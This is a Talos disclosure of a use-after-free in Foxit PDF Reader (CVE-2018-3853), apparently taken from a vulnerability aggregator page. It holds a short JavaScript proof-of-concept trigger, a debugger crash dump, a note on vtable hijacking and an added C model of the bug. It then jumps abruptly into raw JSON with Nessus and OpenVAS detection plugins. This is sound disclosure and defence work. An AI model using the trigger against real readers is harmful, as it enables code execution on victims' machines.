Foxit PDF Reader JavaScript createTemplate Remote Code Execution Vulnerability
2018-04-19T00:00:00
ID TALOS-2018-0536 Type talos Reporter Talos Intelligence Modified 2018-04-19T00:00:00
Description
Talos Vulnerability Report
TALOS-2018-0536
April 19, 2018
CVE Number
CVE-2018-3853
Summary
An exploitable use-after-free vulnerability exists in the JavaScript engine of Foxit Software Foxit PDF Reader version 9.0.1.1049. A specially crafted PDF document can cause a previously freed object in memory to be reused, resulting in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.
Foxit PDF Reader is one of the most popular PDF document readers and has a widespread user base. It aims to have feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Additionally, Foxit PDF Reader supports XFA, or XML Forms Architecture, which is a new way of making interactive PDF forms.
Closing the currently active PDF document via the JavaScript closeDoc call results in the clean-up of many objects. A stale reference to an already freed object can result in a use-after-free condition. If a document tries to create a template but fails, an object is allocated and freed, but a stale reference to it is kept. When the document is closed, this reference is reused, which can lead to memory corruption.
This particular vulnerability lies in the combination of the createTemplate and closeDoc methods, which triggers a use-after-free:
app.alert("alloc and free follow");
this.createTemplate("temp");
app.alert("uaf follows");
this.closeDoc(1);
Opening the proof of concept PDF document in Foxit Reader with PageHeap enabled results in the following crash (note that Foxit Reader will pop up a warning that the file is damaged, due to malformed XFA objects, which is of no consequence to triggering the vulnerability):
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=10fcdfd0 ebx=0feecee8 ecx=10fcdfd0 edx=0000000a esi=134fafd0 edi=00000000
eip=02393106 esp=001bdbb4 ebp=001bdbdc iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
FoxitReader!CertFreeCertificateChain+0x8b6d26:
02393106 83790800 cmp dword ptr [ecx+8],0 ds:0023:10fcdfd8=????????
0:000> !heap -p -a ecx
address 10fcdfd0 found in
_DPH_HEAP_ROOT @ 7331000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
11b81bfc: 10fcd000 2000
69db90b2 verifier!AVrfDebugPageHeapFree+0x000000c2
777569d4 ntdll!RtlDebugFreeHeap+0x0000002f
77719e5b ntdll!RtlpFreeHeap+0x0000005d
776e6416 ntdll!RtlFreeHeap+0x00000142
75b9c5f4 kernel32!HeapFree+0x00000014
02e7b1fb FoxitReader!CertFreeCertificateChain+0x0139ee1b
02583ce5 FoxitReader!CertFreeCertificateChain+0x00aa7905
02583c84 FoxitReader!CertFreeCertificateChain+0x00aa78a4
02583f71 FoxitReader!CertFreeCertificateChain+0x00aa7b91
02394e68 FoxitReader!CertFreeCertificateChain+0x008b8a88
0237bf4c FoxitReader!CertFreeCertificateChain+0x0089fb6c
023898b7 FoxitReader!CertFreeCertificateChain+0x008ad4d7
01558c17 FoxitReader+0x00178c17
01558bab FoxitReader+0x00178bab
014aeada FoxitReader+0x000ceada
014b0ae8 FoxitReader+0x000d0ae8
015f79de FoxitReader+0x002179de
015f77ab FoxitReader+0x002177ab
0160698a FoxitReader+0x0022698a
015f13f7 FoxitReader+0x002113f7
015f1218 FoxitReader+0x00211218
02cd24f9 FoxitReader!CertFreeCertificateChain+0x011f6119
02cd63fc FoxitReader!CertFreeCertificateChain+0x011fa01c
02cd648b FoxitReader!CertFreeCertificateChain+0x011fa0ab
75a9c4b7 USER32!InternalCallWinProc+0x00000023
75a9c5b7 USER32!UserCallWinProcCheckWow+0x0000014b
75a94ede USER32!DispatchClientMessage+0x000000cf
75a94f4d USER32!__fnDWORD+0x00000024
776d6bae ntdll!KiUserCallbackDispatcher+0x0000002e
75a95552 USER32!SendMessageW+0x0000007c
015eee15 FoxitReader+0x0020ee15
02cd8172 FoxitReader!CertFreeCertificateChain+0x011fbd92
Analyzing the heap state clearly shows that ecx points into a freed memory region. If we examine the life of the object more closely, by setting breakpoints before and after calls to createTemplate and closeDoc we can observe the following:
The above shows that the object was allocated before the call to closeDoc and is freed during that call. This limits the window of opportunity that a potential attacker has to manipulate the memory and change the contents of the freed heap chunk, but it is still possible that careful manipulation of the document layout could lead to greater control.
At the time of the crash, a pointer to already freed memory is used as the this pointer. If the contents of this memory are under the attacker's control, a vtable dereference could result in control flow hijacking and ultimately in arbitrary code execution.
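The lifetime bug described above (an object freed on a failed template creation while the document keeps its reference, then touched again during close) can be modelled in a few lines of C. This is an added example, not Foxit's code and not part of the original report: every type and function name is hypothetical, and a small tracking pool stands in for PageHeap so the stale pointer is detected by bookkeeping rather than by actually reading freed memory.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed model. Slots are never reused, so a stale pointer can be
 * classified safely, much as PageHeap keeps freed pages inaccessible. */
enum slot_state { SLOT_UNUSED, SLOT_BUSY, SLOT_FREED };

struct tmpl {                 /* hypothetical template object */
    void *vtable;
    int   id;
    int   page_count;         /* stands in for the field read at close time */
};

#define POOL_SLOTS 8
static struct tmpl     pool[POOL_SLOTS];
static enum slot_state state[POOL_SLOTS];

static struct tmpl *pool_alloc(void)
{
    for (int i = 0; i < POOL_SLOTS; i++) {
        if (state[i] == SLOT_UNUSED) {
            state[i] = SLOT_BUSY;
            memset(&pool[i], 0, sizeof pool[i]);
            return &pool[i];
        }
    }
    return NULL;
}

static void pool_free(struct tmpl *t)
{
    if (t)
        state[t - pool] = SLOT_FREED;
}

/* 1 if p refers to a live object, 0 if it is NULL or already freed. */
static int pool_is_live(const struct tmpl *p)
{
    return p != NULL && state[p - pool] == SLOT_BUSY;
}

struct doc {
    struct tmpl *tmpl;        /* reference the document keeps */
};

/* In this model template construction always fails, matching the report's
 * "tries to create a template, but fails" case. */
static int build_template(struct tmpl *t, const char *name)
{
    (void)t; (void)name;
    return -1;
}

/* Flawed: the reference is published before construction succeeds and is
 * not cleared on the failure path, so doc->tmpl dangles after the free. */
int create_template_flawed(struct doc *d, const char *name)
{
    struct tmpl *t = pool_alloc();
    if (!t) return -1;
    d->tmpl = t;
    if (build_template(t, name) != 0) {
        pool_free(t);
        return -1;
    }
    return 0;
}

/* Hardened: publish the reference only once the object is known good. */
int create_template_fixed(struct doc *d, const char *name)
{
    struct tmpl *t = pool_alloc();
    if (!t) return -1;
    if (build_template(t, name) != 0) {
        pool_free(t);
        return -1;
    }
    d->tmpl = t;
    return 0;
}

enum close_result { CLOSE_OK, CLOSE_STALE_REFERENCE };

/* Clean-up on close visits every object the document still references.
 * Real code would dereference here; the model reports the stale use. */
enum close_result close_doc(struct doc *d)
{
    enum close_result r = CLOSE_OK;
    if (d->tmpl) {
        if (pool_is_live(d->tmpl))
            pool_free(d->tmpl);
        else
            r = CLOSE_STALE_REFERENCE;
    }
    d->tmpl = NULL;
    return r;
}

typedef int (*create_fn)(struct doc *, const char *);

/* Same order of operations as the report: create a template, then close. */
enum close_result run_sequence(create_fn create)
{
    struct doc d = { NULL };
    create(&d, "temp");
    return close_doc(&d);
}

int main(void)
{
    printf("flawed:   %s\n", run_sequence(create_template_flawed)
           == CLOSE_STALE_REFERENCE ? "stale reference used on close" : "ok");
    printf("hardened: %s\n", run_sequence(create_template_fixed)
           == CLOSE_STALE_REFERENCE ? "stale reference used on close" : "ok");
    return 0;
}
```

The hardened variant shows one general way to remove a stale reference of this kind; the report does not describe how the vendor fixed the issue.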
Timeline
2018-03-05 - Vendor Disclosure
2018-04-19 - Public Release
Credit
Discovered by Aleksandar Nikolic of Cisco Talos.
or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_reader_installed.nasl\");\n script_require_keys(\"installed_sw/Foxit Reader\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'Foxit Reader';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [{\n 'min_version' : '9.0',\n 'fixed_version' : '9.1.0.5096'\n }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-01T02:47:24", "description": "According to its version, the Foxit PhantomPDF application (formally\nknown as Phantom) installed on the remote Windows host is prior to\n8.3.6. It is, therefore, affected by multiple vulnerabilities.", "edition": 24, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-12-21T00:00:00", "title": "Foxit PhantomPDF < 8.3.6 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10303", "CVE-2018-3843", "CVE-2017-17557", "CVE-2018-10302", "CVE-2018-3853", "CVE-2018-3842", "CVE-2018-3850", "CVE-2017-14458"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:foxitsoftware:phantompdf", "cpe:/a:foxitsoftware:phantom"], "id": "FOXIT_PHANTOM_8_3_6.NASL", "href": "https://www.tenable.com/plugins/nessus/119837", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119837);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/10/31 15:18:52\");\n\n script_cve_id(\n \"CVE-2017-14458\",\n \"CVE-2017-17557\",\n \"CVE-2018-3842\",\n \"CVE-2018-3843\",\n \"CVE-2018-3850\",\n \"CVE-2018-3853\",\n \"CVE-2018-10302\",\n \"CVE-2018-10303\"\n );\n script_bugtraq_id(103942, 103999);\n\n script_name(english:\"Foxit PhantomPDF < 8.3.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Foxit PhantomPDF.\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally\nknown as Phantom) installed on the remote Windows host is prior to\n8.3.6. It is, therefore, affected by multiple vulnerabilities.\");\n # https://www.foxitsoftware.com/support/security-bulletins.php\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2f244c3e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 8.3.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-3853\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [{\n 'min_version' : '8.0',\n 'max_version' : '8.3.5.30351',\n 'fixed_version' : '8.3.6'\n }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-30T08:25:30", "description": "According to its version, the Foxit PhantomPDF application (formally\nknown as Phantom) installed on the remote Windows host is prior to\n9.1. It is, therefore, affected by multiple vulnerabilities.", "edition": 13, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-12-21T00:00:00", "title": "Foxit PhantomPDF < 9.1 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-5676", "CVE-2018-5680", "CVE-2018-5679", "CVE-2018-5677", "CVE-2018-10303", "CVE-2018-5675", "CVE-2018-3843", "CVE-2017-17557", "CVE-2018-10302", "CVE-2018-5678", "CVE-2018-3853", "CVE-2018-5674", "CVE-2018-7406", "CVE-2018-7407", "CVE-2018-3842", "CVE-2018-3850", "CVE-2017-14458"], "modified": "2018-12-21T00:00:00", "cpe": ["cpe:/a:foxitsoftware:phantompdf", "cpe:/a:foxitsoftware:phantom"], "id": "FOXIT_PHANTOM_9_1_0.NASL", "href": "https://www.tenable.com/plugins/nessus/119838", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119838);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/04/27\");\n\n script_cve_id(\n \"CVE-2017-14458\",\n \"CVE-2017-17557\",\n \"CVE-2018-3842\",\n \"CVE-2018-3843\",\n \"CVE-2018-3850\",\n \"CVE-2018-3853\",\n \"CVE-2018-5674\",\n \"CVE-2018-5675\",\n 
\"CVE-2018-5676\",\n \"CVE-2018-5677\",\n \"CVE-2018-5678\",\n \"CVE-2018-5679\",\n \"CVE-2018-5680\",\n \"CVE-2018-7406\",\n \"CVE-2018-7407\",\n \"CVE-2018-10302\",\n \"CVE-2018-10303\"\n );\n script_bugtraq_id(103942, 103999, 104300);\n\n script_name(english:\"Foxit PhantomPDF < 9.1 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Foxit PhantomPDF.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally\nknown as Phantom) installed on the remote Windows host is prior to\n9.1. It is, therefore, affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.foxitsoftware.com/support/security-bulletins.php\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 9.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-14458\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [{\n 'min_version' : '9.0',\n 'max_version' : '9.0.1.1049',\n 'fixed_version' : '9.1'\n }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-07-17T14:18:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-3843", "CVE-2017-17557", "CVE-2018-10302", "CVE-2018-3853", "CVE-2018-3842", "CVE-2018-3850", "CVE-2017-14458"], "description": "The host is installed with Foxit PhantomPDF\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-04-25T00:00:00", "id": "OPENVAS:1361412562310813157", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813157", "type": "openvas", "title": "Foxit PhantomPDF Multiple Vulnerabilities-Apr18 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Foxit PhantomPDF Multiple Vulnerabilities-Apr18 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the 
implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:foxitsoftware:phantompdf\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813157\");\n script_version(\"2019-07-05T10:16:38+0000\");\n script_cve_id(\"CVE-2018-3842\", \"CVE-2017-17557\", \"CVE-2017-14458\", \"CVE-2018-3853\",\n \"CVE-2018-3850\", \"CVE-2018-3843\", \"CVE-2018-10302\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:16:38 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-04-25 14:50:06 +0530 (Wed, 25 Apr 2018)\");\n script_name(\"Foxit PhantomPDF Multiple Vulnerabilities-Apr18 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Foxit PhantomPDF\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error where the application passes an insufficiently qualified path in\n loading an external library when a user launches the application.\n\n - A heap buffer overflow error.\n\n - Multiple use-after-free errors.\n\n - The use of uninitialized new 'Uint32Array' object or member variables in\n 'PrintParams' or 'm_pCurContex' objects.\n\n - An incorrect memory allocation, memory commit, memory access, or array access.\n\n - Type Confusion errors.\n\n - An error in 'GoToE' & 'GoToR' Actions.\n\n - An out-of-bounds read error in the 
'_JP2_Codestream_Read_SOT' function.\n\n - An error since the application did not handle a COM object properly.\n\n - An error allowing users to embed executable files.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause a denial of service condition, execute arbitrary code and\n gain access to sensitive data from memory.\");\n\n script_tag(name:\"affected\", value:\"Foxit PhantomPDF versions 9.0.1.1049 and\n prior on windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Foxit Reader version 9.1 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://www.foxitsoftware.com/support/security-bulletins.php#content-2018\");\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_foxit_phantom_reader_detect.nasl\");\n script_mandatory_keys(\"foxit/phantompdf/ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\npdfVer = infos['version'];\npdfPath = infos['location'];\n\n## 9.1 == 9.1.0.5096\nif(version_is_less(version:pdfVer, test_version:\"9.1.0.5096\"))\n{\n report = report_fixed_ver(installed_version:pdfVer, fixed_version:\"9.1\", install_path:pdfPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:18:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10303", "CVE-2018-3843", "CVE-2017-17557", "CVE-2018-10302", "CVE-2018-3853", "CVE-2018-3842", "CVE-2018-3850", "CVE-2017-14458"], "description": "The host is installed with Foxit PhantomPDF\n and is prone to multiple vulnerabilities.", "modified": 
"2019-07-05T00:00:00", "published": "2018-05-18T00:00:00", "id": "OPENVAS:1361412562310813196", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813196", "type": "openvas", "title": "Foxit PhantomPDF Multiple Vulnerabilities-May18 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Foxit PhantomPDF Multiple Vulnerabilities-May18 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:foxitsoftware:phantompdf\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813196\");\n script_version(\"2019-07-05T10:16:38+0000\");\n script_cve_id(\"CVE-2017-17557\", \"CVE-2017-14458\", \"CVE-2018-3842\", \"CVE-2018-3853\",\n \"CVE-2018-3850\", \"CVE-2018-10303\", \"CVE-2018-10302\", \"CVE-2018-3843\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:16:38 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-05-18 12:43:57 +0530 (Fri, 18 May 2018)\");\n 
script_name(\"Foxit PhantomPDF Multiple Vulnerabilities-May18 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Foxit PhantomPDF\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An unsafe DLL loading as application passes an insufficiently qualified path\n in loading an external library when a user launches the application.\n\n - An out-of-bounds read and write error.\n\n - A type confusion error while executing certain XFA functions in crafted PDF\n files since the application could transform non-CXFA_Object to CXFA_Object\n without judging the data type and use the discrepant CXFA_Object to get layout\n object directly.\n\n - An unspecified error in GoToE & GoToR Actions.\n\n - The application is not running in Safe-Reading-Mode and can be abused via\n '_JP2_Codestream_Read_SOT' function.\n\n - An error as application do not handle a COM object properly.\n\n - A use-after-free error as the application could continue to traverse pages\n after the document has been closed or free certain objects repeatedly.\n\n - Uninitialized memory or pointer error due to the use of uninitialized new\n 'Uint32Array' object or member variables in 'PrintParams' or 'm_pCurContex'\n objects.\n\n - A use-after-free error due to the use of freed object when executing JavaScript\n or invoking certain functions to get object properties.\n\n - A use-after-free error due to the use of object which has been closed or removed.\n\n - A type confusion error when parsing files with associated file annotations due\n to deference of an object of invalid type.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause a denial of service condition, execute arbitrary code and\n gain access to sensitive data from memory.\");\n\n 
script_tag(name:\"affected\", value:\"Foxit PhantomPDF version 8.3.5.30351 and\n earlier on windows\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Foxit PhantomPDF version 8.3.6\n or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://www.foxitsoftware.com/support/security-bulletins.php#content-2018\");\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_foxit_phantom_reader_detect.nasl\");\n script_mandatory_keys(\"foxit/phantompdf/ver\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\npdfVer = infos['version'];\npdfPath = infos['location'];\n\n## 8.3.6 == 8.3.6.35572\nif(version_is_less(version:pdfVer, test_version:\"8.3.6.35572\"))\n{\n report = report_fixed_ver(installed_version:pdfVer, fixed_version:\"8.3.6\", install_path:pdfPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:18:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-1180", "CVE-2018-5676", "CVE-2018-10476", "CVE-2018-9977", "CVE-2018-10495", "CVE-2018-10490", "CVE-2018-5680", "CVE-2018-9961", "CVE-2018-10493", "CVE-2018-9982", "CVE-2018-9935", "CVE-2018-1173", "CVE-2018-9968", "CVE-2018-9984", "CVE-2018-9951", "CVE-2018-10485", "CVE-2018-9964", "CVE-2018-5679", "CVE-2018-9952", "CVE-2018-10475", "CVE-2018-9979", "CVE-2018-9959", "CVE-2018-5677", "CVE-2018-9962", "CVE-2018-10303", "CVE-2018-1177", "CVE-2018-9963", "CVE-2018-9958", "CVE-2018-9940", "CVE-2018-9975", "CVE-2018-9941", "CVE-2018-9948", "CVE-2018-10483", "CVE-2018-5675", "CVE-2018-1178", "CVE-2018-10473", "CVE-2018-9971", 
"CVE-2018-3939", "CVE-2018-9947", "CVE-2018-10480", "CVE-2018-9954", "CVE-2018-9938", "CVE-2018-9939", "CVE-2018-10478", "CVE-2018-3843", "CVE-2018-9949", "CVE-2018-17623", "CVE-2018-1176", "CVE-2018-10474", "CVE-2018-10484", "CVE-2018-9976", "CVE-2018-9983", "CVE-2018-9981", "CVE-2018-10482", "CVE-2018-9956", "CVE-2018-10492", "CVE-2018-9936", "CVE-2017-17557", "CVE-2018-10302", "CVE-2018-5678", "CVE-2018-10477", "CVE-2018-10494", "CVE-2018-3853", "CVE-2018-10479", "CVE-2018-9972", "CVE-2018-9943", "CVE-2018-9974", "CVE-2018-10487", "CVE-2018-5674", "CVE-2018-1179", "CVE-2018-9965", "CVE-2018-9942", "CVE-2018-9980", "CVE-2018-9969", "CVE-2018-7407", "CVE-2018-3842", "CVE-2018-9978", "CVE-2018-9945", "CVE-2018-9955", "CVE-2018-9950", "CVE-2018-1174", "CVE-2018-9966", "CVE-2018-9957", "CVE-2018-9946", "CVE-2018-10486", "CVE-2018-9960", "CVE-2018-3924", "CVE-2018-1175", "CVE-2018-10488", "CVE-2018-9944", "CVE-2018-10489", "CVE-2018-9937", "CVE-2018-9967", "CVE-2018-9970", "CVE-2018-3850", "CVE-2018-10491", "CVE-2018-10481", "CVE-2018-9973", "CVE-2018-9953", "CVE-2017-14458"], "description": "The host is installed with Foxit Reader\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-04-25T00:00:00", "id": "OPENVAS:1361412562310813156", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813156", "type": "openvas", "title": "Foxit Reader Multiple Vulnerabilities-Apr18 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Foxit Reader Multiple Vulnerabilities-Apr18 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# 
